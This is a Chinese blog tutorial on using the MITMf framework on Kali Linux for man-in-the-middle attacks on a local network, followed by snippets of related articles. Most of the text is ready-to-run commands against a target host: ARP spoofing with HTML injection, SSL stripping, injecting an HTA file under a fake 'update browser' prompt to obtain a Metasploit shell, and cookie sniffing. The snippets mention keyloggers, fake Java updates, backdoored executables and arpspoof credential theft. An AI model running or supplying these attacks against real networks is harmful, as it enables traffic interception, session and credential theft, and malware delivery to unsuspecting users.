局域网中间人:MITMf使用

  系统环境:kali

  安装流程参考github官方地址:https://github.com/byt3bl33d3r/MITMf/wiki/Installation

  安装相关依赖:

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

  下载项目:

git clone https://github.com/byt3bl33d3r/MITMf

  安装相关的子项目和依赖:

cd MITMf && git submodule init && git submodule update --recursive

  安装相关依赖:

pip install -r requirements.txt

  启动并查看MITMf的帮助文件:

python mitmf.py -h

  MITMf的插件挺多的

  基本功能介绍

  在网页中注入HTML代码:

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1 --inject --html-payload ‘<h1>6666666666666666666</h1>‘

  让目标机器浏览的图片全部翻转:

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --upsidedownternet 

  启动sslstrip,把所有的https请求转化为http请求

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1 --hsts 

  在目标机器的 网页中注入 hta 文件, 诱导用户下载, 配合metaspolit可以直接得到shell:

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --hta --text "更新浏览器" 

  监听目标用户的cookies

python mitmf.py -i wlan0 --spoof --arp  --target 172.16.42.131 --gateway 172.16.42.1  --ferretng

  总体来说, 功能非常强大,但是运行的时候, 被攻击的目标机器经常会卡死, 导致网页无法打开 , 用户体验不好, 所以还是用bettercap更靠谱

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329

微信:18101055830

原文地址:https://www.cnblogs.com/diligenceday/p/8076497.html

时间: 2024-10-17 17:09:14

局域网中间人:MITMf使用的相关文章

HTTPS那些事(三)攻击实例与防御(转载)

原创地址:http://www.guokr.com/blog/148613/   在<HTTPS那些事(二)SSL证书>我描述了使用SSL证书时一些需要注意的安全问题,在这一篇文章里面我再演示一下针对HTTPS攻击的一些实例,通过这些实例能更安全的使用HTTPS.知己知彼百战不殆. 先说一下我的测试环境,WIFI局域网,两台计算机,其中一台是Windows 7用于发起攻击.另一台测试机用于测试攻击,配置为Windows XP SP3,IE8,Chrome 17. 在开始之前,再回顾一下SSL证

MITMf:中间人攻击框架 -由中国寒龙整理收集

MITMf:中间人攻击框架 MITMF是一个可用于中间人攻击的框架.这个框架是基于Python的,它拥有数个插件,增加了更多的渗透测试方面的功能.一些实用的插件: jskeylogger – 这个插件可以在目标机器上注入一个 javascript 键盘记录器 JavaPwn – 在客户端利用过时的Java浏览器插件,配合使用Metasploit 安装假的Java更新 FilePwn – 这个插件使用后门工厂掩饰可执行文件,以及通过http发送zip文件 Spoof – 使用ARP欺骗,DNS欺骗

Mitmf中间人攻击框架与beef结合,XSS一把

本文章中所使用的方法只是未了学习教育,如果读者使用该方法用于恶意用途,造成的法律后果,读者自负:网站:https://github.com/byt3bl33d3r/MITMf 安装Mitmf:1. 在Debian下安装依赖包apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcaps

【漏洞复现】局域网 ARP 中间人攻击 获取他人账号密码

日期:2019-07-18 14:24:42 更新: 作者:Bay0net 介绍:如何在局域网内,窃取其他用户的账号密码? 0x01. 漏洞环境 攻击工具 arpspoof 基本用法: arpspoof -i eth0 -t [目标 IP] [网关] arpspoof -i eth0 -t [网关][目标 IP] 攻击机 IP:192.168.43.67 操作系统:Kali 2019 靶机 IP:192.168.43.135 操作系统:Win7 旗舰版 SP1 攻击机和靶机,在同一个局域网内,局

中间人攻击-Arp之局域网内DNS欺骗

基础知识 网关是啥? 网关是工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,网关就好比一个房间通向另一个房间的一扇门. ARP协议 假设A(192.168.1.2)与B(192.168.1.3)在同一局域网,A要和B实现通信.A首先会发送一个数据包到广播地址(192.168.1.255),该数据包中包含了源IP(A).源MAC.目的IP(B).目的MAC,这个数据包会被发放给局域网中所有的主机,但是只有B主机会回复一个包含了源IP(B).源MAC.目的IP(A).目的

MITMF

**************************************************************************需要自行手动安装python-nfqueue,pefile模块sudo apt-get install python-nfqueue,pefilesudo apt-get install mitmf*pip uninstall twistedwget http://twistedmatrix.com/Releases/Twisted/15.5/Twi

Android 中间人攻击

0x00 Android中间人攻击的思路就是劫持局域网中被攻击机器和server间的对话.被攻击机器和server表面上工作正常,实际上已经被中间人劫持.能够从一张图来明确这个过程. 受攻击主机发送的数据,首先经过了攻击者.从server返回的数据也经过攻击者,再发送给受攻击主机. 0x01 Android开源中间人攻击样例.请參考https://github.com/ssun125/Lanmitm.我们这里主要分析这个链接中效果预览中会话劫持的原理. watermark/2/text/aHR0

中间人攻击——ARP欺骗的原理、实战及防御

? 1.1 什么是网关 首先来简单解释一下什么是网关,网关工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,简单地说,网关就好比是一个房间通向另一个房间的一扇门. 1.2 ARP协议是什么 ARP(Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的.而RARP和ARP相反,它是反向地址转换协议,把MAC地址转换为I

中间人攻击

1.什么是中间人攻击Man-in-the-MiddleAttack(简称“MITM攻击”),通过各种技术手段将攻击服务器放置在两台正常通信的计算机之间. 2.中间人攻击的三种方式1)DNS欺骗修改受害人计算机host,或者DNS服务器,控制路由器等方法,把受害人要访问的域名对应的ip解析为攻击者控制的机器,这时受害人发送给目标机器的数据就发到了攻击人的机器上.攻击者可以监听甚至修改数据. 2)会话劫持攻击人参与到受害人和目标机器正常的Tcp会话中,从而干涉会话双方的数据传输.这个“攻击人”可以是